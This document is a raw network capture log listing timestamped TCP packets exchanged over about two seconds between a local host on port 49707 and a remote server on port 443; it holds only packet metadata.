                                                                            Dec 3, 2024 15:27:03.534252882 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:03.534270048 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:03.542376041 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:03.542412043 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:03.542444944 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:03.542453051 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:03.542496920 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:03.542521000 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:03.692576885 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:03.692603111 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:03.692712069 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:03.692742109 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:03.692785978 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:03.698992968 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:03.699029922 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:03.699124098 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:03.699131966 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:03.699206114 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:03.705768108 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:03.705801010 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:03.705866098 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:03.705873013 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:03.705925941 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:03.713418961 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:03.713444948 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:03.713490963 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:03.713498116 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:03.713516951 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:03.713532925 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:03.720823050 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:03.720854998 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:03.720887899 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:03.720894098 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:03.720935106 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:03.720948935 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:03.728108883 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:03.728131056 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:03.728188992 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:03.728197098 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:03.728254080 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:03.735579014 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:03.735596895 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:03.735665083 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:03.735671997 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:03.735711098 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:03.742290020 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:03.742309093 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:03.742377996 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:03.742386103 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:03.742427111 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:03.892745972 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:03.892771959 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:03.892875910 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:03.892890930 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:03.892930031 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:03.900114059 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:03.900130033 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:03.900207043 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:03.900216103 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:03.900254965 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:03.907583952 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:03.907604933 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:03.907682896 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:03.907692909 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:03.907735109 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:03.914350986 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:03.914372921 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:03.914437056 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:03.914447069 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:03.914511919 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:03.921998978 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:03.922020912 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:03.922090054 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:03.922099113 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:03.922153950 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:03.929127932 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:03.929168940 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:03.929202080 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:03.929210901 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:03.929233074 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:03.929250956 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:03.936749935 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:03.936789989 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:03.936820984 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:03.936829090 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:03.936847925 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:03.936863899 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:03.944174051 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:03.944191933 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:03.944262981 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:03.944271088 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:03.944304943 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.094666958 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.094693899 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.094795942 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.094809055 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.094847918 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.101418018 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.101439953 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.101485968 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.101492882 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.101520061 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.101536036 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.109755039 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.109772921 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.109829903 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.109837055 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.109879971 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.116456032 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.116472006 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.116525888 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.116532087 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.116579056 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.123409986 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.123425961 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.123483896 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.123492002 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.123537064 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.131222963 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.131239891 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.131292105 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.131298065 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.131335020 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.138356924 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.138379097 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.138469934 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.138477087 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.138509989 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.145589113 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.145612001 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.145649910 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.145661116 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.145678043 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.145695925 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.296056032 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.296083927 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.296192884 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.296205997 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.296248913 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.304083109 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.304106951 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.304162025 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.304169893 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.304205894 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.304223061 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.310049057 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.310075045 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.310132027 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.310137987 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.310187101 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.317655087 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.317681074 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.317742109 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.317748070 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.317785025 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.325135946 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.325162888 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.325226068 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.325232029 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.325273991 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.332425117 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.332448959 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.332508087 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.332515001 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.332551003 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.339899063 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.339925051 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.339967012 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.339972973 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.339997053 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.340012074 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.347489119 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.347518921 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.347558975 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.347565889 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.347594023 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.347609043 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.497395992 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.497425079 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.497524977 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.497546911 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.497586012 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.504139900 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.504165888 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.504218102 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.504235029 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.504271984 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.511578083 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.511606932 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.511658907 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.511676073 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.511719942 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.519237041 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.519262075 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.519323111 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.519337893 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.519382954 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.525985003 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.526010990 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.526067019 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.526082993 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.526123047 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.533989906 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.534018993 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.534089088 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.534105062 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.534137964 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.540726900 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.540751934 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.540816069 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.540829897 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.540863991 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.548233986 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.548257113 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.548299074 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.548310995 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.548343897 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.698740005 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.698776007 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.698889017 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.698911905 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.699003935 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.705507994 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.705532074 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.705585957 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.705602884 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.705650091 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.713155031 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.713184118 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.713241100 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.713254929 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.713274956 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.713293076 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.720571995 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.720599890 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.720637083 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.720652103 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.720666885 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.720686913 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.727325916 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.727351904 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.727400064 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.727413893 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.727448940 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.735307932 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.735340118 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.735402107 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.735414982 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.735454082 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.742077112 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.742099047 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.742153883 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.742168903 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.742203951 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.750019073 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.750045061 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.750086069 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.750102997 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.750134945 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.899899960 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.899928093 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.900062084 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.900062084 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.900090933 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.900134087 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.907507896 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.907588959 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.907622099 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.907671928 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.914917946 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.914942980 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.914984941 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.915010929 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.915019989 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.915046930 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.921665907 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.921689987 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.921731949 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.921756983 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.921772957 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.921797991 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.929533958 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.929559946 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.929593086 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.929619074 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.929635048 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.929656982 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.936423063 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.936446905 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.936525106 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.936525106 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.936548948 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.936584949 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.944101095 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.944108009 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.944144964 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.944178104 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.944190025 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.944226027 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.951560974 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.951587915 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.951627016 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.951643944 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:04.951661110 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:04.951682091 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:05.101558924 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:05.101587057 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:05.101789951 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:05.101804972 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:05.101850986 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:05.108289003 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:05.108315945 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:05.108357906 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:05.108372927 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:05.108392000 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:05.108450890 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:05.116004944 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:05.116029978 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:05.116103888 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:05.116115093 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:05.116161108 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:05.123385906 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:05.123424053 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:05.123460054 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:05.123471022 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:05.123492956 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:05.123558998 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:05.131059885 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:05.131087065 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:05.131241083 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:05.131249905 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:05.131288052 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:05.138475895 CET44349707185.199.109.133192.168.2.5
